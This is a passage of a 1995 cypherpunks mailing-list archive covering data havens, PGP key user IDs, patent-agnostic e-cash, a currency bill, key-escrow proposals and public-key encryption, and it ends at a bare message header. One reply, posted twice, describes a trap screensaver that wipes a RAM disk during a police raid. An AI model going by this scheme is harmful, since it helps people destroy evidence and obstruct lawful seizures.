To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The Dangers of Caribbean Data Havens
In-Reply-To: <ac70802208021004b5e3@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950904162332.20551D-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Sep 1995, Timothy C. May wrote:

> >From Bruce Sterling in "Islands in the Net" to various reports of data
> havens and Internet services being set up by actual people, there has been
> much speculation about using Caribbean islands for data havens.
> 
> But the infrastructure has been lacking. Low-bandwidth inter-island links.
[...]
> Personally, I think a distributed system based on crypto is a more robust
> approach, the "Libertaria in Cyberspace" view I've talked about.

For legal purposes, perhaps, set up shop on the Islands.

Then have a site somewhere else -- backup of your corporate system, 
nothing more.  And, of course, a net connection -- all for redundancy's sake.

If your Euro/American site is merely a mirror of a legal site in another 
country, and you're the same organization, would it be legal?

Hmmmm... this all still needs work...
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@mail.msen.com (Lou Poppler)
Date: Mon, 4 Sep 95 14:08:41 PDT
To: Hal <cypherpunks@toad.com
Subject: Re: pseudonyms & list health
In-Reply-To: <199509040451.VAA23173@jobe.shell.portal.com>
Message-ID: <NI2SwMz2BgTU083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 3 Sep 1995 21:51:21 -0700, Hal <hfinney@shell.portal.com> wrote:

} An interesting point.  I have long wished that there would be a form of
} "credential certificates" which people could give as special signatures
} on other people's public keys.  Then using Chaumian credential technology
} it would be possible to anonymously transfer these credentials from one
} pseudonym to another.
/.../ 
} I certainly appreciate these kinds of comments, but it would be even
} more useful if such messages were expressed as the kinds of
} certificates I am describing.  I wonder whether people would be willing
} to use a program which would let them issue such "reputation
} signatures" of various kinds, and display the signatures which were
} present on keys.
/.../ 
} I could see such a system initially being piggybacked on PGP keys (the
} signatures would not be understandable by PGP though), although for
} Chaumian credential transfers the keys have to be specially structured
} and that would require a new approach.

When the list was discussing "key as final authority" a while back,
Wei Dai posted (on May 31) a program called 'addid' which allows one
to add arbitrary strings as user IDs on other peoples' pgp keys.
These appear just as though PGP had added them itself, and are signable
and displayable by regular old PGP.

As an exercise, I grabbed Hal's "insecure key" from the keyserver,
and used 'addid' to add a new ID to it, which I then signed.

Here's the output of 'pgp -kc 0xcbd301':
Key ring: 'pubring.pgp', looking for user ID "0xcbd301".
Type bits/keyID    Date       User ID
pub   512/4ECBD301 1994/11/29 Hal writes good posts -- Read them all
sig!      2C48CAE9 1995/09/04  Lou Poppler <lwp@mail.msen.com>
                              Hal Finney insecure key
sig!      58214C37 1994/12/01  Hal Finney <74076.1041@compuserve.com>

(If anyone cares) here is Hal's key cbd301, as summarized above:
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBNAy7bVn8AAAECAPRhqHLha5WFaFQw0/b1Wn8XCuHokjvbEeJbg5UPHs6fBE3i
uZTmAY5aFqnFXOdNGackOOTYu3tEGcwsm07L0wEABRG0JkhhbCB3cml0ZXMgZ29v
ZCBwb3N0cyAtLSBSZWFkIHRoZW0gYWxsiQCVAwUQMEtYRWpfQFwsSMrpAQFG4gQA
gH38LFuPGKo/bP2paTNWdpid9Gq8+xF3/K35I3fj+mgDsRDoGQGiJOzpksqAOYy5
PRKW9lC9vB1kPGoit7L4kjptsVB6MtBJeLnMYDF77CZUj/Sjvcjapbn0pNgFVHd5
AQjD8JJilL9nzjc6C77XUcDMAqoBFDmOsDU0+epzv/m0F0hhbCBGaW5uZXkgaW5z
ZWN1cmUga2V5iQCVAwUQLt5K9agTA69YIUw3AQED0gQAoORH1weDQ+L2gefrRauI
GLqDlNy0nJQDo5wgdJky5Pd7vUJalwxGuqnQG1QV+ejnRYEN7wEoYQRjv21tTos9
nbUtWAoINrEVjWHpG7AXIRNyoCJtket9mQ2jz9QNTD9Nt8JsedJlqLuT7RMLN1tb
/cIYnrBCyuTCek4fRbTYkSU=
=xEr2
- -----END PGP PUBLIC KEY BLOCK-----


here is my key 48cae9, which signs the above new ID (and this mail):
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAiyLuS0AAAEEALvPIvz5q0PzIEvuAmyIXPz89jG8jB5tcRl5itVNVhvqTL9/
Z+dlfBHvzL5d7FpTj3qPxe7tDFsH/MB1JJV/DhhLSAzvoyg8cEDkFJhwPihrytGK
xgTgdO3NYL0Pq5o6Kk86LqVpRO8LamKM9sJgQGn6q9t+vbtHdGpfQFwsSMrpAAUR
tB9Mb3UgUG9wcGxlciA8bHdwQG1haWwubXNlbi5jb20+iQCVAwUQL+6zzGpfQFws
SMrpAQHAMwQAuzbPEV2JP6nUKKP8v1qRAQELvz4GfH++B6XwzxTmiz65kkfC/uOz
LB9MIe/VNrulriTUGI3U0FjfuaSvJLQq92t434NK9/SXAfK6iemq9Bz7Pb8/iuB7
VfMTR8+Yvda8zScX6Rms49zmyOf8vC1n+4C0kJsKSlw+gy8GuaxSLZ6JAJUDBRAv
vAPCG46b4I3URvEBAZwfBACNXe36MeaLcJIVvSQz4/1Iz7Iqy8ukS2xoG7fJGPvx
DHjDYMn2xFtGF16IRKN8UuIpldfY1fFU5CI9vLCEqd5katbRrnZjcpF2Vp0QC3nP
egpDlXYUOe9kwSjIOdUIlCQn0lTIxqGSzT8hCKxn8i0HD1hSa2NtREptf8pUH3Ln
Ig==
=w+eq
- -----END PGP PUBLIC KEY BLOCK-----


::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::   Lou Poppler  <lwp@mail.msen.com>   |    Doom an evil deed,           ::
::     http://www.msen.com/~lwp/        |     liven a mood.               ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEtoa2pfQFwsSMrpAQGDAwQAjrdHWqJSsI5WB9exvJZf21mVZwCjaGuH
XlK/e0+i6p3Zf8YYyY3EFP/gwL4191PhB2AG2gD77tI0ijG7GI8gD0nZQc3ZwH/C
N+zfgH9OOOVxu5CUKcuSBC8AgIu7RYdKb3WFqA+5QczjaWjKiz5XuviJoUg1QLGD
TemyBujRxhE=
=RYHl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 4 Sep 95 16:38:57 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <199509042314.QAA18360@Csli.Stanford.EDU>
Message-ID: <199509042338.QAA18782@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



FYI.
Repost from sci.crypt. It seems as it has expired 
at some places.

/Christian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 4 Sep 95 16:45:35 PDT
To: cypherpunks@toad.com
Subject: Identity Agnostic Online Cash
Message-ID: <v02120d00ac714b3ee057@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



An early draft of a paper based on my comments at the Crypto '95
rump session is available at:

http://www.communities.com/paper/agnostic.html

Here's the abstract:

Abstract: One of the unique aspects of Chaum's blind signature
scheme for anonymous transactions is that it is practiced entirely
by the side that wants to be anonymous. In a customer-bank
relationship, the customer's software practices the technology, not
the bank's. Chaum's patent on blind signatures cites as prior art a
non-anonymous signature scheme that differs significantly only in
steps taken by the "customer" side. An open standard for
electronic cash would then allow a bank or other cash issuer to
remain agnostic with respect to customer's software blinding or
not blinding. Since the bank's software would be practicing
technology cited as prior art by Chaum in his patent, and would
have a substantial non-infringing use, I argue that the bank would
not need to license Chaum's patents, provided the bank itself only
provided non-blinding customer software.


Here's a review of the talk by Hal Finney... :-)

One of the more interesting talks I thought was from cypherpunk Doug
Barnes, on "identity agnostic" electronic cash.  This is basically an
idea for creating a Magic-Money-type electronic cash server without
violating Chaum's cash patent.  What you do is to run the server and
publish a spec it will follow.  All the server does is do an RSA
signature on the raw data it receives and decrement the user's account
accordingly.  The user has a choice of doing blinding or not on the
signature.

Chaum's patent covers the blinding, so if the user wants to do that he
should be sure to license the patent or live somewhere it doesn't apply
(or ignore it if he figures he's too small potatoes for them to care
about).  But the server isn't responsible for checking all this.  It just
does RSA sigs, which is prior art as far as Chaum's patent goes.  Users
can blind or not, it doesn't care.  It is "identity agnostic" as Doug
says.

The implication is that with an RSA license you could run this kind of
bank (online cash) and ignore Chaum's patents, while a horde of end users
violate the patents but take safety in numbers and get anonymity.
Lawyers like to go after big targets but the servers aren't violating
anything.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Mon, 4 Sep 95 14:12:34 PDT
To: www-buyinfo@allegra.att.com
Subject: Re: e$: More fun with cash: Senate Bill 307
Message-ID: <199509042110.RAA22377@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:41 PM 9/4/95 -0400, Robert Hettinga wrote:
>Has anyone heard about this bill?  Comments?

This idea seems to get proposed every few years. In the past it
has been shelved as soon as someone figures out the disaster that
would be caused by the resultant decline in the value of the
dollar. The U.S. Government has to be nice to foreigners that hold large
quantities of dollars and treasury securities, even if it doesn't
care about the political consequences at home.


--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 4 Sep 95 14:14:41 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: e$: More fun with cash: Senate Bill 307
In-Reply-To: <Pine.SUN.3.91.950904111848.5541B-100000@crl2.crl.com>
Message-ID: <Pine.SUN.3.91.950904170619.17185B-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Sep 1995, Sandy Sandfort wrote:

> Date: Mon, 4 Sep 1995 11:35:20 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> To: Robert Hettinga <rah@shipwright.com>
> Cc: cypherpunks@toad.com
> Subject: Re: e$: More fun with cash: Senate Bill 307
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Mon, 4 Sep 1995, Robert Hettinga wrote:
> 
> > Has anyone heard about this bill?  Comments?
> 
> > >(c)  Currency Exchange--
> > >     (1)  Plan--Not later than 12 months after the date of enactment of this
> > >section, the Secretary shall devedlop and begin implementation of a plan to
> > >require the exchange of all existing $100 denomination United States currency
> > >held within and outside of the United States for $100 denomination domestic
> > >use and nondomestic use United States currency issued in accordance with this
> > >sectin.
> 
> . . .
> 
> > >     (1)  domestic use currency, issued in accordance with this section shall
> > >be recognized as constituting a negotiable claim against the United States
> > >Treasury only when presented within the United States, and shall constitute
> > >legal tender for any debts, public or private, only when presented in the
> > >United States, . . .
> 
> > >     (2)  nondomestic use currency shall be recognized as constituting a
> > >negotiable claim against the United States Treasure, and legal tender
> > >for any debts, public or private, only when presented outside of the 
> > >United States, . . .
> 
> It's obvious that this bill has very little to do with large-scale
> money laundering, narcotrafficking nor terrorism.  All those folks 
> will simply use "domestic use currency" inside or outside of the 
> United States.  At worst, it will cause them a one-time problem.
> 
> Then at whom is the bill really aimed?  Average, middle-class
> Americans, is my guess.  Fortunately, it doesn't look too tough
> to get around.  If you have a matress full of C-notes, I suggest
> you start using them to buy travelers checks--including a few
> denominated in strong foreign currencies.


Actually it was aimed at the rumors that Iran had been printing U.S. 
currency on a large scale and using it abroad.  When I say Iran, I mean 
a government backed program.  New York Times had an article on the matter 
last year.  With enough interest I will try to Lexis/Nexus it.

While there was some evidence that Iran had indeed been forging notes, 
the extent was unclear/minimal.  Of course, with this kind of rumor there 
is the issue of confidence in the currency as well as actual threat.

The first response was the inset of the polyester and foil thread in the 
bills (and NO they can't detect quantity as you go through airport 
sensors, and don't ask me again).  The foreign traveller will notice the 
serious scrutiny all U.S. bills abroad will receive, particular attention 
paid to the presence of the strip.  Many foreign shops will not take U.S. 
bills which are older and have no strip as a result.

This new plan, which is total lunacy of course, and which I expect to fail, 
but the real zap is on anyone with a spare million in counterfeit or undeclared 
currency.

I might add, try being a tourist in Estonia and presenting U.S. bills that 
are no good in the U.S.  You'll be about as popular as someone in the 
Midwest with Canadian bills.

>
>  S a n d y
> 

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Mon, 4 Sep 95 14:21:11 PDT
To: cypherpunks@toad.com
Subject: Re: The Dangers of Caribbean Data Havens
Message-ID: <199509042119.RAA22672@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:19 AM 9/4/95 -0700, Timothy C. May wrote:
>"Outages" lasting days or weeks after these islands get torn up every few
>years will not go too well with international commerce.

I thought there were a number of bank and credit card data entry
centers that had already moved to the Carribean. They may not care
if the local phone service gets wiped out for several weeks if
they have a hardened line to the nearest Cable & Wireless earth station.


--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 4 Sep 95 17:23:23 PDT
To: pfarrell@netcom.com
Subject: Re: Acceptable NIS&T restrictions
Message-ID: <199509050019.RAA27055@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:54 PM 9/4/95 -0400, Pat Farrell commented on the NIST's
latest proposals for their September meeting on export controls
and software with built-in government access to keys (GAK).
I'll generally use the terms GAK or master keying rather than escrow,
since escrow is a legal term that implies both the willingness of
both parties to use it, and also that the escrowed material
be delivered only when certain criteria are satisfied, which is 
out of the scope of almost any proposals I've seen labelling themselves
"key escrow", particularly the Clipper system.
Material with > and indentation are from the NIST paper;
material with just > and 0-1 spaces is Pat's.

64 bits of keyspace is of course hopelessly inadequate for financial
transactions - crackerboxes have been designed that allow very rapid breaking
of single-DES or short-key RC4, and a useful platform needs to accommodate
high-value transactions such as customers access to stockbrokers as well as
more limited-value transactions such as credit cards where a $1000 cracking
cost makes crime not pay well.  The Administration argues that the limitation
makes up for the possibility that users may find ways to evade GAK; but users
can already do that now.

>    "Avoiding multiple encryption -- How can the product be
>     designed so as to prevent doubling (or tripling, etc.) the
>     key space of the algorithm?"
>CME has been suggesting DES | TRAN | DES | TRAN | DES
>for years. Can they really _avoid_ (i.e. prevent) this?
(CME is Carl Ellison at TIS; tran is a simple transposition system.)

Sure - if the software always tacks in master keys any time it
does a symmetric-key encryption, and won't/can't decrypt without it,
then DES+GAK | DES+GAK | DES+GAK is just as vulnerable to someone
with the master key as single DES+GAK - it just takes three separate
phases of key forfeiture to decode.  (yes, I left out the tran phase;
anybody going to that much work is using something other than the
built-in encryption, at which point they might as well use
non-government-approved encryption themselves.)  Does it triple the
key space?  For people without the master key, yes, though maybe they
get some known plaintext.  For people with the master key, it depends
on your definitions, and maybe _they_ put in some known plaintext that
they don't give outsiders, but it probably doesn't lose them much.

>    "Disabling the key escrow mechanism -- How can products be
>     made resistant to alteration that would disable or
>     circumvent the key escrow mechanism?  How can the "static
>     patch" problem be avoided?  How can this be tested?"
>
>This is easy in hardware. Is it even possible in software?

Probably.  Consider the sort of master-key system where part of the
session key isn't transmitted - maybe you do something like
hash the user portion of the session key with the hash of the
program and feed it to the KeyMaster's public key to get
the session key.  By the time you put all of that into
Pretty Good PatchAround, you might as well just use PGP.

>    "Practical Key Access -- How can mechanisms be designed so
>     that repeated involvement of escrow agents is not required
>     for decryption for multiple files/messages during the
>     specified access period?"
>At least this has a chance of being real. We need to have a suggestion
>for expiration times for the escrowed keys. This was a huge problem with the
>initial Clipper.  

Information can't be destroyed, only forgotten, so time-limitation is tough.
What you can do is limit the scope of messages that can be decrypted by
one trip to the keymaster - the Feds are looking for some mechanism so that
any limits like this won't require multiple trips for one bunch of wiretapping.

>Is there a reasonable middle ground between long term keys such
>as PGP uses, and the ephemeral keys of a D-H exchange?

What's reasonable?  Some potential models for a PGPng would be 
- Use separate keys for signatures/keysigning and messages, so you could
change your message key frequently while leaving your signature (or at least
key-signature) key stable.  (This tends to need an extra layer in the web
of trust, since you now have two tiers for yourself, but no biggie.)
- Diffie-Hellman kind of mechanism to encrypt the keys, with published
g, p, g**x mod p, x changing frequently, RSA or DSS or whatever to sign
the keyparts - this works better with a more interactive key negotiation
so you can use a new x every time (e.g. request directly from the user,
though that's difficult for email, or a keyserver that maintains a set of
keys to be doled out.)

>    "Certified escrow agents -- Can products be designed so that
>     only escrow agents certified by the U.S. government (domestic, 
>     or under suitable arrangements, foreign) are utilized?  
>     What should be the criteria for an acceptable U.S. escrow agent?"

The technical and political questions are quite different.  
Technically, you could have the software require a hierarchical-style
certificate for the key-master keys with a US Government CA wired in.
It's not totally foolproof - patching the CA is easy unless you've got
some sort of checksum on the software.  But it's a start, and it's simple
enough that either the US could authorize separate versions for France
or certify the French government's key-master agency.

Also, there's a need for escrow/keymaster agents to be negotiable per-message -
since escrow inherently requires the trust of all parties, and probably
contractual agreements as well, and government-enforced keymastering
may require satisfying multiple governments, parties will persumably
have different lists of acceptable keymasters.

>We all know that Tim's Flakey Key Escrow Service is most likely not
>"an acceptable US escrow agent."  But since CKE is a good thing, what
>are the characteristics of an acceptable service to us?

As far as the political criteria go, I believe the traditional formulation
is along the lines of "I am not now, nor have I ever been, a member of...." :-)
Establishing criteria is difficult, and depends on whether the whole system
will be defined by laws passed by Congress or only by organizational policy;
there are also issues of control between the Commerce Department, NIST, NSA,
and the State Department.  

For Commercial Key Escrow, or commercial key-backup services, the criteria are 
"whoever can be trusted to provide the services the customers want".
In this case, of course, the service most customers want is to be left alone,
or, failing that, to have the government's Master Key system provide minimal
risk
to the security of the actual transactions - 64 bit keys are not enough security
for any high-valued financial transactions, though they may suffice for
credit cards.
One required characteristic would appear to be either sufficiently deep pockets
to collect judgements for violations of trust or a sufficiently high
reputation that
violations of trust are not expected.  

Most of the commercial market for key escrow or backup services fits into three
categories - backups for the owner/sender of a file (which they can provide
themselves, using techniques like PGP's Encrypt-to-Self option, or file backups
with secret-sharing), acknowledgements of transmission (signed hashes would do),
and dispute-resolution issues (verifying the contents of a message which may
require
information from both parties or ephermeral session key information.)
Most can be provided by the kind of services currently provided by companies
like
bonding agencies, emergency backup and offsite storage companies, etc.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 4 Sep 95 17:23:55 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: Basic Public key algorithms.
Message-ID: <199509050020.RAA27203@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:01 PM 9/2/95 CDT, droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
wrote:
>After doing quite a bit of poking around, I am somewhat discouraged
>in my attempts to find a simple *pure* public key encryption method,
>without a lot of other stuff wrapped around it. 

Pure public-key is usually not very useful, since it's rather slow
for encrypting big messages by itself.  PKP has the patents to all public-
key systems until mid-1997, and for RSA until some time like 2001,
and Schnorr for longer.  Unfortunately, RSAREF (except for one version
where they slipped) requires non-commercial users to limit themselves
to the published interface or get explicit permission, and the published
interface always throws in DES with a random key for encryption.
Since you're talking embedded systems, you're probably commercial and
high enough volume that the cost for licensing RSA is probably low enough.

>What I need is to encrypt between 45 and 55 bits of information
>using a public key algorithm in an embedded environment. 

45-55 bits may be tough, depending on the constraints of your
environment - most public-key systems need 768-1024 bits of
key to be reasonably secure, and need to send an output field
at least that long to be decodeable.  If that's not a problem,
you've got some choices.  For instance, you could use Diffie-Hellman
to create a shared secret, and just XOR that with your material
(have the workstation generate a master x, g, and p, and
store g**x in your embedded system; choose a random y each time, and
send g**y mod p and the first |M| bits of (g**xy mod p) xor M.
To do that, you need to store g**x, g, and p, possibly in ROM,
and enough code to do modular exponentiation and random number generation;
hopefully your system will have some kind of quasi-physical source of
randomness.


#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 4 Sep 95 14:36:54 PDT
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <199509041725.TAA12314@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.950904173143.17862B-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Sep 1995, Anonymous wrote:

> Date: Mon, 4 Sep 1995 19:25:07 +0200
> From: Anonymous <anon-remailer@utopia.hacktic.nl>
> To: mail2news@utopia.hacktic.nl, cypherpunks@toad.com
> Newgroups: alt.security.pgp, alt.politics.org.fbi
> Subject: Re: Emergency File Wipe Algorithim
> 
> When a running computer is seized in some sort of law enforcement
> raid, what are the chances someone would think to backup the
> contents of a RAMDISK drive prior to powering it down?
> 
> 

Why would you even ask this question?  If the odds are > 0 (which they 
are) they are too high as the solution is simple.

A screensaver which shuts down the system entirely if anything but "}" is 
pressed.

If any key but the secret one is pressed by an excited agent, the ramdisk 
is gone.  If the computer is simply powered down, the ramdisk is gone.

I suggest, rather than a ramdisk however, an encrypted partition al la 
CryptDisk or Secure(Drive? Device?).


---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@access.digex.net>
Date: Mon, 4 Sep 95 14:40:09 PDT
To: unicorn@access2.digex.net
Subject: Returned mail: User unknown
Message-ID: <199509042136.RAA18457@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Mon, 4 Sep 1995 17:35:13 -0400
from unicorn@localhost

   ----- The following addresses had delivery problems -----
Anonymous <anon-remailer@utopia.hacktic.nl>  (unrecoverable error)

   ----- Transcript of session follows -----
... while talking to utopia.hacktic.nl.:
>>> RCPT To:<anon-remailer@utopia.hacktic.nl>
<<< 550 <anon-remailer@utopia.hacktic.nl>... User unknown
550 Anonymous <anon-remailer@utopia.hacktic.nl>... User unknown
451 cypherpunks@toad.com... reply: read error from toad.com.

   ----- Original message follows -----


To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: Emergency File Wipe Algorithim
From: Black Unicorn <unicorn@access2.digex.net>
Date: Mon, 4 Sep 1995 17:35:07 -0400 (EDT)
cc: mail2news@utopia.hacktic.nl, cypherpunks@toad.com
In-Reply-To: <199509041725.TAA12314@utopia.hacktic.nl>

On Mon, 4 Sep 1995, Anonymous wrote:

> Date: Mon, 4 Sep 1995 19:25:07 +0200
> From: Anonymous <anon-remailer@utopia.hacktic.nl>
> To: mail2news@utopia.hacktic.nl, cypherpunks@toad.com
> Newgroups: alt.security.pgp, alt.politics.org.fbi
> Subject: Re: Emergency File Wipe Algorithim
> 
> When a running computer is seized in some sort of law enforcement
> raid, what are the chances someone would think to backup the
> contents of a RAMDISK drive prior to powering it down?
> 
> 

Why would you even ask this question?  If the odds are > 0 (which they 
are) they are too high as the solution is simple.

A screensaver which shuts down the system entirely if anything but "}" is 
pressed.

If any key but the secret one is pressed by an excited agent, the ramdisk 
is gone.  If the computer is simply powered down, the ramdisk is gone.

I suggest, rather than a ramdisk however, an encrypted partition al la 
CryptDisk or Secure(Drive? Device?).


---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kkennedy@mindspring.com (Ken Kennedy)
Date: Mon, 4 Sep 95 10:57:41 PDT
To: Jay Campbell <edge@got.net>
Subject: Re: Helping out on site
In-Reply-To: <Pine.SGI.3.91.950902194010.8460C-100000@Sequoia.picosof.com>
Message-ID: <199509041757.NAA21117@dylan.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


On 2 Sep 1995 20:47:04 -0600, you wrote:

>On 2 Sep 1995, Dar Scott wrote:
>
>> >I finished my first release, a megabyte-sized file done in MORE, a powerful
>> >outline processor (which enabled me to maintain notes, make
>> >cross-references, and generally manage such a huge writing project). I
>> >released it last year, and put it in my anonymous ftp account at
>> >ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom
>> >is often very crowded, though.
>> 
>> After several tries I was not able to get this.  Has anyone made it
>> available in an alternate location?
>
>Tim mentioned that we're planning on spiffing up the cypherpunks web
>site (including using a real web server) and the cyphernomicon is an
>obvious candidate for inclusion - depending on how many people help out,
>the new site (a quasi-mirror at first, till we get sameer/et al's
>go-ahead) should be live within a couple weeks.
>
>If you're interested in gathering documents, hacking HTML, or anything
>else involved in creating/maintaining a web hierarchy, drop me a line.
>The space/delivery of the documents we're providing for free, but I
>don't have a budget to hire a staff to do things the "right way" (my way :)
>for this project.
>
>--
>   Jay Campbell - Regional Operations Manager
>   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node)   edge@you.got.net 
>                  "Shoot the Fruit Loop"               408.469.9400
>
>
Jay:

Let me know if I can be of any assistance.  I'm no UNIX guru, but I
can find my way around, and I can "hack"(literally! :-) ) HMTL (I use
the HotDog HTML editor).  I've been lurking around the list for awhile
now, and this looks like a good opportunity to be "of service".  Just
let me know, or reply if you have any questions.  Thanks.


Later,

     Ken Kennedy  <kenzoid@io.com> or <kkennedy@mindspring.com>
                  Finger kenzoid@io.com for PGP public key...
                  http://www.io.com/~kenzoid/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 4 Sep 95 15:25:40 PDT
To: cypherpunks@toad.com
Subject: Re: e$: More fun with cash: Senate Bill 307
Message-ID: <199509042224.SAA05533@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn wrote:

<snips>
>
>Actually it was aimed at the rumors that Iran had been printing U.S. 
>currency on a large scale and using it abroad.  When I say Iran, I mean 
>a government backed program.  New York Times had an article on the matter 
>last year.  With enough interest I will try to Lexis/Nexus it.

I had heard that it was the Columbians, branching out from the cocaine
business with those fancy new copy machines, which are supposed to be
able to duplicate the blue & red threads in US currency paper.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMEt7vW1lp8bpvW01AQGnwwQAmPz1SagLoKpAmfUvwyI8GVq8wSOaFH96
vTarz6PxnuNPHhITIAzPeq8EX5N8MexRfHtMbmK0JOxA5L+B+QHP1rTM8mqUbAJh
Gg4ZMC9Jzvhq+JENaP8ZG03+pvm1nnZIr8WarY5DJ8FYNMLvDrSUhhWFu7OSo2a+
fS0NKxpm5Ps=
=HXa+
-----END PGP SIGNATURE-----
Regards, Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas 
when the money is left in the hands of TAXPAYERS, God only knows 
what they do with it.  Bake it into pies, probably.  Anything to 
avoid creating jobs.  -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 4 Sep 95 18:30:48 PDT
To: liberty@gate.net (Jim Ray)
Subject: (NOISE) Re: e$: More fun with cash: Senate Bill 307
Message-ID: <199509050127.SAA14037@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I had heard that it was the Columbians, branching out from the cocaine
>business with those fancy new copy machines, which are supposed to be
>able to duplicate the blue & red threads in US currency paper.

But if the government was _serious_ about supply-side drug-trade reduction,
wouldn't they _encourage_ this sort of thing?  After all, that way
the Colombians can make as much money as they do today without the
bother of hauling all that white powder into the US?  :-)

(Sure, it's a cypherpunk topic, after all real crypto is mainly about
economics and threat analysis :-)

>See, when the GOVERNMENT spends money, it creates jobs; whereas 
>when the money is left in the hands of TAXPAYERS, God only knows 
>what they do with it.  Bake it into pies, probably.  Anything to 
>avoid creating jobs.  -- Dave Barry
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
